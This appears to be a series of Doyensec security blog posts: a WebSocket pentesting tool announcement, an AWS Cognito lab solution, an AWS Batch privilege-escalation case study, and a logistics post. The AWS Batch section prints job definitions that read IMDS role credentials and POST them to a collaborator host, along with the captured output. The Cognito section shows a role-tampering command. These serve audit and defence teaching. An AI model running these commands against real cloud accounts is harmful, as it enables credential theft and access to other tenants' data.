However, when tasked with pentesting these WebSockets, it feels like you’re juggling flaming torches on a unicycle, atop a tightrope! Existing tools, while proficient in their specific realms, are much like mismatched puzzle pieces – they don’t quite fit together, leaving you to bridge the gaps. Consequently, you find yourself shifting from one tool to another, trying to manage them simultaneously and wishing for a more streamlined approach.

That’s where https://github.com/doyensec/wsrepl comes to the rescue. This tool, the latest addition to Doyensec’s security tools, is designed to simplify auditing of websocket-based apps. wsrepl strikes a much needed balance by offering an interactive REPL interface that’s user-friendly, while also being conveniently easy to automate. With wsrepl, we aim to turn the tide in websocket pentesting, providing a tool that is as efficient as it is intuitive.

The Doyensec Challenge

Once upon a time, we took up an engagement with a client whose web application relied heavily on WebSockets for soft real-time communication. This wasn’t an easy feat. The client had a robust bug bounty policy and had undergone multiple pentests before. Hence, we were fully aware that the lowest hanging fruits were probably plucked. Nevertheless, as true Doyensec warriors (‘doyen’ - a term Merriam-Webster describes as ‘a person considered to be knowledgeable or uniquely skilled as a result of long experience in some field of endeavor’), we were prepared to dig deeper for potential vulnerabilities.

Our primary obstacle was the application’s custom protocol for data streaming. Conventional wisdom among pentesters suggests that the most challenging targets are often the ones most overlooked. Intriguing, isn’t it?

The Quest for the Perfect Tool

The immediate go-to tool for pentesting WebSockets would typically be Burp Suite. While it’s a heavyweight in web pentesting, we found its implementation of WebSockets mirrored HTTP requests a little bit too closely, which didn’t sit well with near-realtime communications.

Sure, it does provide a neat way to get an interactive WS session, but it’s a bit tedious - navigating through ‘Upgrade: websocket’, hopping between ‘Repeater’, ‘Websocket’, ‘New WebSocket’, filling in details, and altering HTTP/2 to HTTP/1.1. The result is a decent REPL but the process? Not so much.

Don’t get me wrong, Burp does have its advantages. Pentesters already have it open most times, it highlights JSON or XML, and integrates well with existing extensions. Despite that, it falls short when you have to automate custom authentication schemes, protocols, connection tracking, or data serialization schemes.

Other tools, like websocketking.com and hoppscotch.io/realtime/websocket, offer easy-to-use and aesthetically pleasing graphical clients within the browser. However, they lack comprehensive options for automation. Tools like websocket-harness and WSSiP bridge the gap between HTTP and WebSockets, which can be useful, but again, they don’t offer an interactive REPL for manual inspection of traffic.

Finally, we landed on websocat, a netcat-inspired command line WebSockets client that comes closest to what we had in mind. While it does offer a host of features, it’s predominantly geared towards debugging WebSocket servers, not pentesting.

`wsrepl`: The WebSockets Pentesting Hero

Enter wsrepl, born out of necessity as our answer to the challenges we faced. It is not just another pentesting tool, but an agile solution that sits comfortably in the middle - offering an interactive REPL experience while also providing a simple and convenient path to automation.

Built with Python’s fantastic TUI framework Textual, it enables an accessible experience that is easy to navigate both by mouse and keyboard. That’s just scratching the surface though. Its interoperability with curl’s arguments enables a fluid transition from the Upgrade request in Burp to wsrepl. All it takes is to copy a request through ‘Copy as curl command’ menu option and replace curl with wsrepl.

On the surface, wsrepl is just like any other tool, showing incoming and outgoing traffic with the added option of sending new messages. The real magic, however, is in the details. It leaves nothing to guesswork. Every hexadecimal opcode is shown as per RFC 6455, a feature that could potentially save you from many unnecessary debugging hours.

A lesson learned

Here’s an anecdote to illustrate this point. At the beginning of our engagement with WebSockets, I wasn’t thoroughly familiar with the WebSocket RFC and built my understanding based on what Burp showed me. However, Burp was only displaying text messages, obscuring message opcodes and autonomously handling pings without revealing them in the UI. This partial visibility led to some misconceptions about how WebSockets operate. The developers of the service we were testing seemingly had the same misunderstanding, as they implemented ping traffic using 0x1 - text type messages. This caused confusion and wasted time when my scripts kept losing the connection, even though the traffic appeared to align with my Burp observations.

To avoid similar pitfalls, wsrepl is designed to give you the whole picture, without any hidden corners. Here’s a quick rundown of WebSocket opcodes defined in RFC 6455 that you can expect to see in wsrepl:

Opcode	Description
0x0	Continuation Frame
0x1	Text Frame
0x2	Binary Frame
0x8	Connection Close
0x9	Ping
0xA	Pong (must carry the same payload as the corresponding Ping frame)

Although most WebSocket protocols mainly use 0x1 type messages, wsrepl accompanies all messages with their opcodes, ensuring full transparency. We’ve intentionally decided not to conceal ping traffic by default, although you can hide it using the --hide-ping-pong option.
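For readers who want to see where the opcode lives on the wire, here is a small Python sketch that decodes the first two header bytes of a frame as laid out in RFC 6455. It is independent of wsrepl's internals; `describe_frame` and `OPCODES` are names made up for this example.

```python
# Opcode names, mirroring the table above.
OPCODES = {
    0x0: "Continuation Frame",
    0x1: "Text Frame",
    0x2: "Binary Frame",
    0x8: "Connection Close",
    0x9: "Ping",
    0xA: "Pong",
}


def describe_frame(frame: bytes) -> dict:
    """Decode the first two header bytes of a WebSocket frame (RFC 6455)."""
    if len(frame) < 2:
        raise ValueError("a WebSocket frame header is at least 2 bytes long")
    first, second = frame[0], frame[1]
    opcode = first & 0x0F  # low nibble of the first byte
    return {
        "fin": bool(first & 0x80),       # final fragment flag
        "opcode": opcode,
        "name": OPCODES.get(opcode, "Reserved"),
        "masked": bool(second & 0x80),   # client-to-server frames are masked
        "length_field": second & 0x7F,   # 126 and 127 signal an extended length
    }


if __name__ == "__main__":
    # Unmasked text frame carrying "Hello", then an unmasked ping with the same payload.
    print(describe_frame(bytes([0x81, 0x05]) + b"Hello"))
    print(describe_frame(bytes([0x89, 0x05]) + b"Hello"))
```

A "ping" sent as a 0x1 text frame and a real 0x9 ping differ only in that low nibble, which is exactly the detail a UI that hides opcodes will never show you.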

Additionally, wsrepl introduces the unique capability of sending ‘fake’ ping messages, that use the 0x1 message frame. Payloads can be defined with options --ping-0x1-payload and --pong-0x1-payload, and the interval controlled by --ping-0x1-interval. It also supports client-induced ping messages (protocol level, 0x9), even though typically this is done by the server: --ping-interval.
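The difference between the two kinds of ping is easiest to see at the frame level. The sketch below builds masked client frames by hand following RFC 6455. It is not how wsrepl implements these options, `build_client_frame` is a hypothetical helper, and the JSON body of the application-level ping is an invented example payload.

```python
import os
import struct
from typing import Optional


def build_client_frame(opcode: int, payload: bytes, mask_key: Optional[bytes] = None) -> bytes:
    """Build a single, final, masked client-to-server frame (RFC 6455)."""
    if mask_key is None:
        mask_key = os.urandom(4)
    if len(mask_key) != 4:
        raise ValueError("mask key must be exactly 4 bytes")
    length = len(payload)
    if opcode >= 0x8 and length > 125:
        raise ValueError("control frames carry at most 125 payload bytes")

    header = bytes([0x80 | opcode])  # FIN bit set, then the opcode
    if length < 126:
        header += bytes([0x80 | length])  # MASK bit set, 7-bit length
    elif length < 65536:
        header += bytes([0x80 | 126]) + struct.pack("!H", length)
    else:
        header += bytes([0x80 | 127]) + struct.pack("!Q", length)

    # XOR every payload byte with the rotating 4-byte masking key.
    masked = bytes(b ^ mask_key[i % 4] for i, b in enumerate(payload))
    return header + mask_key + masked


if __name__ == "__main__":
    # Protocol-level ping: opcode 0x9, answered by the peer's WebSocket stack.
    protocol_ping = build_client_frame(0x9, b"keepalive")
    # Application-level "fake" ping: an ordinary 0x1 text frame (payload is made up).
    fake_ping = build_client_frame(0x1, b'{"type": "ping"}')
    print(protocol_ping.hex(), fake_ping.hex())
```

Only the first byte distinguishes the two on the wire, but the server treats them very differently: the 0x9 frame never reaches application code, while the 0x1 frame is just another message for the application to interpret.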

It’s also noteworthy that wsrepl incorporates an automatic reconnection feature in case of disconnects. Coupled with granular ping control, these features empower you to initiate long-lasting and stable WebSocket connections, which have proven useful for executing certain attacks.

Automation Made Simple with `wsrepl`

Moreover, wsrepl is crafted with a primary goal in mind: enabling you to quickly transition into WebSocket automation. To do this, you just need to write a Python plugin, which is pretty straightforward and, unlike Burp, feels quintessentially pythonic.

from wsrepl import Plugin

MESSAGES = [
    "hello",
    "world"
]

class Demo(Plugin):
    """Demo plugin that sends a static list of messages to the server."""
    def init(self):
        self.messages = MESSAGES

It’s Python, so really, the sky’s the limit. For instance, here is how to send an HTTP request to acquire the auth token, and then use it to authenticate with the WebSocket server:

from wsrepl import Plugin
from wsrepl.WSMessage import WSMessage

import json
import requests

class Demo(Plugin):
    """Demo plugin that dynamically acquires authentication token."""
    def init(self):
        # Here we simulate an API request to get a session token by supplying a username and password.
        # For the demo, we're using a dummy endpoint "https://hb.cran.dev/uuid" that returns a UUID.
        # In a real-life scenario, replace this with your own authentication endpoint and provide necessary credentials.
        token = requests.get("https://hb.cran.dev/uuid").json()["uuid"]

        # The acquired session token is then used to populate self.messages with an authentication message.
        # The exact format of this message will depend on your WebSocket server requirements.
        self.messages = [
            json.dumps({
                "auth": "session",
                "sessionId": token
            })
        ]

The plugin system is designed to be as flexible as possible. You can define hooks that are executed at various stages of the WebSocket lifecycle. For instance, you can use on_message_sent to modify messages before they are sent to the server, or on_message_received to parse and extract meaningful data from the server’s responses. The full list of hooks is as follows:

Customizing the REPL UI

The true triumph of wsrepl lies in its capacity to automate even the most complicated protocols. It is easy to add custom serialization routines, allowing you to focus on the stuff that matters.

Say you’re dealing with a protocol that uses JSON for data serialization, and you’re only interested in a single field within that data structure. wsrepl allows you to hide all the boilerplate, yet preserve the option to retrieve the raw data when necessary.

from wsrepl import Plugin

import json
from wsrepl.WSMessage import WSMessage

class Demo(Plugin):
    async def on_message_sent(self, message: WSMessage) -> None:
        # Grab the original message entered by the user
        original = message.msg

        # Prepare a more complex message structure that our server requires.
        message.msg = json.dumps({
            "type": "message",
            "data": {
                "text": original
            }
        })

        # Short and long versions of the message are used for display purposes in REPL UI.
        # By default they are the same as 'message.msg', but here we modify them for better UX.
        message.short = original
        message.long = message.msg


    async def on_message_received(self, message: WSMessage) -> None:
        # Get the original message received from the server
        original = message.msg

        try:
            # Try to parse the received message and extract meaningful data.
            # The exact structure here will depend on your websocket server's responses.
            message.short = json.loads(original)["data"]["text"]
        except (ValueError, KeyError, TypeError):
            # In case of a parsing error, let's inform the user about it in the history view.
            message.short = "Error: could not parse message"

        # Show the original message when the user focuses on it in the UI.
        message.long = original

In conclusion, wsrepl is designed to make your WebSocket pentesting life easier. It’s the perfect blend of an interactive REPL experience with the ease of automation. It may not be the magical solution to every challenge you’ll face in pentesting WebSockets, but it is a powerful tool in your arsenal. Give it a try and let us know your experiences!

Messing Around With AWS Batch For Privilege Escalations

2023-06-13T00:00:00+02:00

From The Previous Episode… Have you solved the CloudSecTidbit Ep. 2 IaC lab?

Solution

The challenge for the AWS Cognito CloudSecTidbit is basically escalating the privileges to admin and reading the internal users list.

The application uses AWS Cognito to issue a session token saved as a cookie with the name aws-cognito-app-access-token.

The JWT is a valid AWS Cognito user token, usable to interact with the service. It is possible to retrieve the current user attributes with the command:

aws cognito-idp get-user --region us-east-1 --access-token <USER_ACCESS_TOKEN>
{
    "Username": "francesco",
    "UserAttributes": [
        {
            "Name": "sub",
            "Value": "5139e6e7-7a37-4e6e-9304-8c32973e4ac0"
        },
        {
            "Name": "email_verified",
            "Value": "true"
        },
        {
            "Name": "name",
            "Value": "francesco"
        },
        {
            "Name": "custom:Role",
            "Value": "user"
        },
        {
            "Name": "email",
            "Value": "dummy@doyensec.com"
        }
    ]
}

Then, because of the default READ/WRITE permissions on the user attributes, the attacker is able to tamper with the custom:Role attribute and set it to admin:

aws --region us-east-1 cognito-idp update-user-attributes --user-attributes "Name=custom:Role,Value=admin" --access-token <USER_ACCESS_TOKEN>

After that, by refreshing the authenticated tab, the user is now recognized as an admin.

That happens because the vulnerable platform trusts the custom:Role attribute to evaluate the authorization level of the user.
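To make the flaw concrete, here is a minimal sketch of the kind of check that leads to this issue. The `is_admin` helper is hypothetical and is not taken from the lab's code; the attribute list has the same shape as the `get-user` output above.

```python
# Hypothetical authorization check, for illustration only.

def attributes_to_dict(user_attributes):
    """Flatten Cognito's [{"Name": ..., "Value": ...}] list into a dict."""
    return {attr["Name"]: attr["Value"] for attr in user_attributes}


def is_admin(user_attributes):
    # Vulnerable pattern: the decision relies on an attribute that the
    # user can rewrite with update-user-attributes.
    return attributes_to_dict(user_attributes).get("custom:Role") == "admin"


before = [
    {"Name": "name", "Value": "francesco"},
    {"Name": "custom:Role", "Value": "user"},
]
after = [
    {"Name": "name", "Value": "francesco"},
    {"Name": "custom:Role", "Value": "admin"},
]
print(is_admin(before), is_admin(after))
```

A check like this is only as trustworthy as the write permissions on the attribute it reads, so the role should come from data that the user's own access token cannot modify.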

Tidbit No. 3 - Messing around with AWS Batch For Privilege Escalations

Q: What is AWS Batch?

A set of batch management capabilities that enable developers, scientists, and engineers to easily and efficiently run hundreds of thousands of batch computing jobs on AWS.
AWS Batch dynamically provisions the optimal quantity and type of compute resources (e.g. CPU or memory optimized compute resources) based on the volume and specific resource requirements of the batch jobs submitted.
With AWS Batch, there is no need to install and manage batch computing software or server clusters, allowing you to instead focus on analyzing results and solving problems.
AWS Batch plans, schedules, and executes your batch computing workloads using Amazon EC2 (available with Spot Instances) and AWS compute resources with AWS Fargate or Fargate Spot.

Summarizing the previous points, it is a self-managed and self-scaling scheduler for tasks.

Its main components are:

Jobs. The unit of work, they can be shell scripts, executables, or a container image submitted to AWS Batch.
Job definitions. They are blueprints for the tasks. It is possible to grant them IAM roles to access AWS resources, set their memory and CPU requirements and even control container properties like environment variables or mount points for persistent storage
Job Queues. Submitted jobs are stacked in queues until they are scheduled onto a compute environment. Job queues can be associated with multiple compute environments and configured with different priority values.
Compute environments. Sets of managed or unmanaged compute resources that are usable to run jobs. With managed compute environments, you can choose the desired compute type (Fargate, EC2 and EKS) and deeply configure its resources. AWS Batch launches, manages, and terminates compute types as needed. You can also manage your own compute environments, but you’re responsible for setting up and scaling the instances in an Amazon ECS cluster that AWS Batch creates for you.

The scheme below (taken from the AWS documentation) shows the workflow for the service.

After a first look at AWS Batch basics, we can introduce the core differences in the managed compute environment types.

Orchestration Types In Managed Compute Environments

Fargate

AWS Batch jobs can run on AWS Fargate resources. AWS Fargate uses Amazon ECS to run containers and orchestrates their lifecycle.

This configuration fits cases where control over the host machine running the container task is not needed. All the logic is embedded in the task and there is no need to add context from the host machine.

EC2

AWS Batch jobs can run on Amazon EC2 instances. It allows particular instance configurations like:

Settings for vCPUs, memory and/or GPU
Custom Amazon Machine Image (AMI) with launch templates
Custom environment parameters

This configuration fits scenarios where it is necessary to customize and control the containers’ host environment. As an example, you may need to mount an Elastic File System (EFS) and share some folders with the running jobs.

EKS

AWS Batch doesn’t create, administer, or perform lifecycle operations of the EKS clusters. AWS Batch orchestration scales up and down nodes managed by AWS Batch and runs pods on those nodes.

The logic conditions are similar to the ECS case.

Running Tasks With Two Metadata Services & Two Roles - The Unwanted Role Exposition Case

While testing a multi-tenant platform, we managed to leverage AWS Batch to compromise the cloud environment and perform privilege escalation.

The single tenants were using AWS Batch to execute some computational work given a certain input to be processed (tenant data).

The task jobs of all tenants were initialized and executed using the EC2 orchestration type; hence, all batch containers were running on the same task-runner EC2 instances.

The scheme below describes the observed scenario at a high-level.

The tenant data (input) was mounted on the EC2 spot instance prior to the execution with Elastic File System (EFS). As can be seen in the design scheme, the specific tenant input data was shared to batch job containers via precise shared folders.

This might seem like a secure and well-isolated environment, but it wasn’t.

In order to illustrate the final exploitation, a few IAM concepts about the vulnerable context must be explained:

Within the described design, the compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data
The task containers (batch jobs) had an execution role with the batch:RegisterJobDefinition and batch:SubmitJob permissions.

The Testing Phase

So, during testing we obviously tried to execute code on the jobs to get access to some internal AWS credentials. Since the Instance Metadata Service (IMDSv2) was network restricted in the running containers, it was not possible to have an easy win by reaching 169.254.169.254 (IMDS IP).

Nevertheless, containers running in ECS and EKS have the Container Metadata Service (CMDS) running and reachable at 169.254.170.2 (did you know?). It is literally the doppelganger of the IMDS service, but for containers and pods in AWS.

Thanks to it, we were able to gather information about the running task. By looking at the AWS documentation, you can learn more about the many environment variables exposed to the running container. Among them, there is AWS_CONTAINER_CREDENTIALS_RELATIVE_URI.

In fact, the CMDS protects users against SSRF interactions by setting a dynamic credential endpoint saved as an environmental variable. By doing so, basic SSRFs cannot find out the pseudo-random part in it and retrieve credentials.
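As a rough sketch of that lookup, the credentials URL is the CMDS address followed by the value of the environment variable. The helper names below are our own, and the relative URI in the example is made up (the real one contains a random identifier); the fetch only works from inside a container managed by ECS.

```python
import json
import os
import urllib.request

CMDS_BASE = "http://169.254.170.2"


def credentials_url(environ=os.environ):
    """Build the task credentials URL from the container's environment."""
    relative_uri = environ.get("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI")
    if not relative_uri:
        raise RuntimeError("AWS_CONTAINER_CREDENTIALS_RELATIVE_URI is not set")
    return CMDS_BASE + relative_uri


def fetch_task_credentials(environ=os.environ, timeout=2):
    """Fetch the task role credentials (requires running inside the container)."""
    with urllib.request.urlopen(credentials_url(environ), timeout=timeout) as resp:
        return json.load(resp)


# Made-up value, only to show how the URL is assembled.
example_env = {"AWS_CONTAINER_CREDENTIALS_RELATIVE_URI": "/v2/credentials/EXAMPLE-ID"}
print(credentials_url(example_env))
```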

The screenshot below shows an interaction with the CMDS to get the credentials from a running container (our execution context).

At this point, we had the credentials for the ecs-role owned by the running jobs.

Among the ECS-related execution permissions, it had RegisterJobDefinition, SubmitJob and DescribeJobQueues for the AWS Batch service.

Since the basic threat model assumed that users had command execution on the running containers, a certain level of control over the job definitions was not an issue.

Hence, having the RegisterJobDefinition and SubmitJob permissions exposed in the user-controlled context was not considered a vulnerability in the first place.

So, the next question was pretty obvious:

The Turning Point

After many hours of dorking and code review, we managed to discover two additional details:

In the AWS Batch with EC2 compute environment, the jobs’ containers run with host network configuration. This means that Batch job containers use the host EC2 Spot instance’s networking directly

The platform was restricting the IMDS connectivity on job containers when the worker was starting the tasks

Due to these conditions, a batch job could call the IMDSv2 service on behalf of the host EC2 Spot instance if it started without the restrictions applied by the worker, potentially leading to a privilege escalation:

An attacker with the leaked batch job credentials could use RegisterJobDefinition and SubmitJob to define and execute a malicious AWS Batch job.
The malicious job is able to dialogue with the IMDS service on behalf of the host EC2 Spot instance since the network restrictions to the IMDS were not applied.
In this way, it was possible to obtain credentials for the IAM Role owned by the EC2 Spot instances.

The compute environment EC2 spot instances needed a specific role with highly privileged permissions to manage multiple services, including EFS to mount customers’ data etc.

PrivEsc Exploitation

The exploitation phase required two job definitions to interact with the IMDSv2, one to get the instance IAM role name, and one to retrieve the IAM security credentials for the leaked role name.
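Before looking at the job definitions, the IMDSv2 flow they rely on can be sketched in Python. This is only an illustration of the same requests the curl commands perform; the helper names are our own, and `send` only succeeds from a host that can actually reach the IMDS.

```python
import urllib.request

IMDS = "http://169.254.169.254"
CREDS_PATH = "/latest/meta-data/iam/security-credentials/"


def token_request(ttl_seconds=21600):
    """IMDSv2 first requires a session token, obtained with a PUT request."""
    return urllib.request.Request(
        IMDS + "/latest/api/token",
        method="PUT",
        headers={"X-aws-ec2-metadata-token-ttl-seconds": str(ttl_seconds)},
    )


def metadata_request(token, path):
    """Any later metadata read must present the session token."""
    return urllib.request.Request(
        IMDS + path, headers={"X-aws-ec2-metadata-token": token}
    )


def role_name_request(token):
    # Step 1: listing the directory returns the instance role name.
    return metadata_request(token, CREDS_PATH)


def role_credentials_request(token, role_name):
    # Step 2: appending the role name returns its temporary credentials.
    return metadata_request(token, CREDS_PATH + role_name)


def send(request, timeout=2):
    """Send a prepared request and return the body as text."""
    with urllib.request.urlopen(request, timeout=timeout) as resp:
        return resp.read().decode()
```

Two jobs were needed in practice because the role name returned by the first step has to be known before the second request can be written into a job definition.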

Job Definition 1 - Getting the host EC2 Spot instance role name

$ aws batch register-job-definition --job-definition-name poc-get-rolename --type container --container-properties '{ "image": "curlimages/curl",
"vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-data/iam/security-credentials/ > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'

After registering the job definition, submit a new job using the newly created job definition:

aws batch submit-job --job-name attacker-jb-getrolename --job-queue LowPriorityEc2 --job-definition poc-get-rolename --scheduling-priority-override 999 --share-identifier asd

Note: the job queue name was retrievable with aws batch describe-job-queues

The attacker collaborator server received something like:

POST /exfil HTTP/1.1
Host: fo78ichlaqnfn01sju2ck6ixwo2fqaez.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 44
Content-Type: application/x-www-form-urlencoded

iam-instance-role-20230322003148155300000001

Job Definition 2 - Getting the credentials for the host EC2 Spot instance role

$ aws batch register-job-definition --job-definition-name poc-get-aimcreds --type container --container-properties '{ "image": "curlimages/curl",
"vcpus": 1, "memory": 20, "command": [ "sh","-c","TOKEN=`curl -X PUT http://169.254.169.254/latest/api/token -H X-aws-ec2-metadata-token-ttl-seconds:21600`; curl -s -H X-aws-ec2-metadata-token:$TOKEN http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE_NAME > /tmp/out ; curl -d @/tmp/out -X POST http://BURP_COLLABORATOR/exfil; sleep 4m"]}'
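Embedding JSON and a shell one-liner inside a single-quoted argument is easy to get wrong. As a hedged sketch, the container properties can be generated with `json.dumps` and quoted with `shlex.quote` instead of being written by hand. The `container_properties` and `register_command` helpers are hypothetical; the CLI flags and property values are the ones used in the commands above.

```python
import json
import shlex


def container_properties(shell_command, image="curlimages/curl"):
    """Container properties with the same fields as the job definitions above."""
    return {
        "image": image,
        "vcpus": 1,
        "memory": 20,
        "command": ["sh", "-c", shell_command],
    }


def register_command(name, shell_command):
    """Return an `aws batch register-job-definition` command line as a string."""
    props = json.dumps(container_properties(shell_command))
    return " ".join([
        "aws batch register-job-definition",
        "--job-definition-name", shlex.quote(name),
        "--type container",
        "--container-properties", shlex.quote(props),
    ])


# Harmless placeholder command, only to show the generated quoting.
print(register_command("poc-example", "echo hello; sleep 1"))
```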

As with the previous definition, after submitting the job, the collaborator received the output.

POST /exfil HTTP/1.1
Host: 4otxi1haafn4np1hjj21kvimwd24qyen.oastify.com
User-Agent: curl/8.0.1-DEV
Accept: */*
Content-Length: 1430
Content-Type: application/x-www-form-urlencoded

{"RoleArn":"arn:aws:iam::1235122316123:role/ecs-role","AccessKeyId":"<redacted>","SecretAccessKey":"<redacted>","Token":"<redacted>","Expiration":"2023-03-22T06:54:42Z"}

This time it contained the AWS credentials for the host EC2 Spot instance role.

Privilege escalation achieved! The obtained role allowed us to access other tenants’ data and do much more.
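For reference, temporary credentials in this format are typically used by exporting them as the standard AWS environment variables. The sketch below maps the fields of the exfiltrated JSON to those variables; the `credentials_to_env` helper is our own naming and the sample keeps the redacted placeholders.

```python
import json
import shlex


def credentials_to_env(imds_json):
    """Map an IMDS security-credentials document to AWS environment variables."""
    creds = json.loads(imds_json)
    return {
        "AWS_ACCESS_KEY_ID": creds["AccessKeyId"],
        "AWS_SECRET_ACCESS_KEY": creds["SecretAccessKey"],
        "AWS_SESSION_TOKEN": creds["Token"],
    }


sample = (
    '{"AccessKeyId":"<redacted>","SecretAccessKey":"<redacted>",'
    '"Token":"<redacted>","Expiration":"2023-03-22T06:54:42Z"}'
)
for name, value in credentials_to_env(sample).items():
    # shlex.quote keeps the printed line safe to paste into a shell.
    print(f"export {name}={shlex.quote(value)}")
```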

Default Host Network Mode In AWS Batch With EC2 Orchestration

In AWS Batch with EC2 compute environments, the containers run with bridged network mode.

With such configuration, the containers (batch jobs) have access to both the EC2 IMDS and the CMDS.

The issue lies in the fact that the container job is able to dialogue with the IMDSv2 service on behalf of the EC2 Spot instance because they share the same network interface.

In conclusion, it is very important to know about such behavior and avoid the possibility of introducing privilege escalation patterns while designing cloud environments.

For cloud security auditors

When the platform uses AWS Batch compute environments with EC2 orchestration, answer the following questions:

- Always keep in consideration the security of the AWS Batch jobs and their possible compromise. A threat actor could escalate vertically/horizontally and gain more access into the cloud infrastructure.
  - Which aspects of the job execution are controllable by the external user?
  - Is command execution inside the jobs intended by the platform?
    - If yes, investigate the permissions available through the CMDS
    - If no, attempt to achieve command execution within the jobs’ context
  - Is the IMDS restricted from the job execution context?
- Which types of Compute Environments are used in the platform?
  - Are there any Compute Environments configured with EC2 orchestration?
    - If yes, which role is assigned to EC2 Spot Instances?

Note: The dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with EC2 launch type.

For developers

Developers should be aware of the fact that AWS Batch with EC2 compute environments will run containers with host network configuration. Consequently, the executed containers (batch jobs) have access to both the CMDS for the task role and the IMDS for the host EC2 Spot Instance role.

In order to prevent privilege escalation patterns, Job runs must match the following configurations:

Having the IMDS restricted at network level in running jobs. Read the documentation here
Restricting the batch job execution role and job role IAM permissions. In particular, avoid assigning RegisterJobDefinition and SubmitJob permissions in job-related or accessible policies to prevent uncontrolled execution by attackers landing on the job context

If you cannot apply both configurations in your design, consider changing the orchestration type.
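A quick way to review the second point is to scan the policy documents attached to job-related roles for the two risky actions. The following is a rough sketch under simplifying assumptions: it only looks at `Allow` statements with an `Action` element, supports wildcards, and ignores `NotAction`, `Deny` statements and conditions. The function name is hypothetical.

```python
from fnmatch import fnmatchcase

RISKY_ACTIONS = ("batch:RegisterJobDefinition", "batch:SubmitJob")


def _as_list(value):
    """IAM allows both a single value and a list for Statement and Action."""
    return value if isinstance(value, list) else [value]


def risky_batch_actions(policy_document):
    """Return the risky Batch actions allowed by an IAM policy document (dict)."""
    found = set()
    for statement in _as_list(policy_document.get("Statement", [])):
        if statement.get("Effect") != "Allow":
            continue
        for pattern in _as_list(statement.get("Action", [])):
            for action in RISKY_ACTIONS:
                # IAM action names are case-insensitive and may contain wildcards.
                if fnmatchcase(action.lower(), pattern.lower()):
                    found.add(action)
    return sorted(found)


example_policy = {
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Action": ["batch:Submit*", "s3:GetObject"], "Resource": "*"}
    ],
}
print(risky_batch_actions(example_policy))
```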

Note: Once again, the dangerous behavior described in this blogpost also applies to configurations involving Elastic Container Service (ECS) tasks with the EC2 launch type.

Hands-On IaC Lab

Stay tuned for the next episode!

Resources

Logistics for a Remote Company

2023-06-06T00:00:00+02:00

Logistics and shipping devices across the world can be a challenging task, especially when dealing with customs regulations. For the past few years, I have had the opportunity to learn about these complex processes and how to manage them efficiently. As a Practice Manager at Doyensec, I was responsible for building processes from scratch and ensuring that our logistics operations ran smoothly.

Since 2018, I have had to navigate the intricate world of logistics and shipping, dealing with everything from international regulations to customs clearance. Along the way, I have learned valuable lessons and picked up essential skills that have helped me manage complex logistics operations with ease.

In this post, I will share my experiences and insights on managing shipping devices across the world, dealing with customs, and building efficient logistics processes. Whether you’re new to logistics or looking to improve your existing operations, my learnings and experiences will prove useful.

Employee Onboarding

At Doyensec, when we hire a new employee, our HR specialist takes care of all the necessary paperwork, while I focus on logistics. This includes creating a welcome package and shipping all the necessary devices to the employee’s location. While onboarding employees from the United States and European Union is relatively easy, dealing with customs regulations in other countries can be quite challenging.

For instance, shipping devices from/to countries such as the UK (post-Brexit), Turkey, or Argentina can be quite complicated. We need to be aware of the customs regulations in these countries to ensure that our devices are not bounced back or charged with exorbitant customs fees.

Navigating customs regulations in different countries can be a daunting task. Still, we’ve learned that conducting thorough research beforehand and ensuring that our devices comply with the necessary regulations can help avoid any unnecessary delays or fees. At Doyensec, we believe that providing our employees with the necessary tools and equipment to perform their job is essential, and we strive to make this process as seamless as possible, regardless of where the employee is located.

Testing Hardware Management

At Doyensec, dealing with testing hardware is a crucial aspect of our operations. We use a variety of testing equipment for our work. This means that we often have to navigate customs regulations, including the payment of customs fees, to ensure that our laptops, YubiKeys and mobile devices arrive on time.

To avoid delays in conducting security audits, we often choose to pay additional fees, including VAT and customs charges, to ensure that we receive hardware promptly. We understand that time is of the essence, and we prioritize meeting our clients’ needs, even if it means spending more money to ensure items required for testing are not held up at customs.

In addition to paying customs fees, we also make sure to keep all necessary documentation for each piece of hardware that we manage. This documentation helps us to speed up further processes and ensures that we can quickly identify and locate each and every piece of hardware when needed.

The hardware we most frequently deal with is laptops, though we occasionally receive YubiKeys as well. Fortunately, because of their low market value, YubiKeys generally do not cause any problems at customs, and we can usually receive them without any significant issues.

Over time, we’ve learned that different shipping companies have different approaches to customs regulations. To ensure that we can deliver quality service to our clients, we prefer to use companies that we know will treat us fairly and deliver hardware on time. We have almost always had a positive experience with DHL as our preferred shipping provider. DHL’s automated customs processes and documentation have been particularly helpful in ensuring smooth and efficient shipping of Doyensec’s hardware and documents across the world. DHL’s reliability and efficiency have been critical in allowing Doyensec to focus on its core business, which is finding bugs for our fantastic clients.

We have a preference for avoiding local post office services when it comes to shipping our hardware or documents. While local post office services may be slightly cheaper, they often come with more problems. Packages may get stuck somewhere during the delivery process, and it can be difficult to follow up with customer service to resolve the issue. This can lead to delayed deliveries, frustrated customers, and ultimately, a negative impact on the company’s reputation. Therefore, Doyensec opts for more reliable shipping options, even if they come with a slightly higher price tag.

2022 Holiday Gifts from Japan

At Doyensec, we believe in showing appreciation for our employees and their hard work. That’s why we decided to import some gifts from Japan to distribute among our team members. However, what we did not anticipate was the range of customs fees that we would encounter while shipping these gifts to different countries.

We shipped these gifts to 7 different countries, all through the same shipping company. However, we found that customs officers had different approaches even within the same country. This resulted in customs fees ranging from 0 to 45 euros for each package.

The interesting part was that every package had the same invoice from the Japanese manufacturer attached, but the fees still differed significantly. It was challenging to understand why this was the case, and we still don’t have a clear answer.

Overall, our experience with importing gifts from Japan highlighted the importance of being prepared for unexpected customs fees and the unpredictability of customs regulations.

Conclusion

Managing devices and shipping packages to team members at a globally distributed company, even with a small team, can be quite challenging. Ensuring that packages are delivered promptly and to the correct location can be very difficult, especially with tight project deadlines.

Although it would be easier to manage devices if everyone worked from the same office, at Doyensec, we value remote work and the flexibility that it provides. That’s why we have invested in developing processes and protocols to ensure that our devices are managed efficiently and securely, despite the remote working environment.

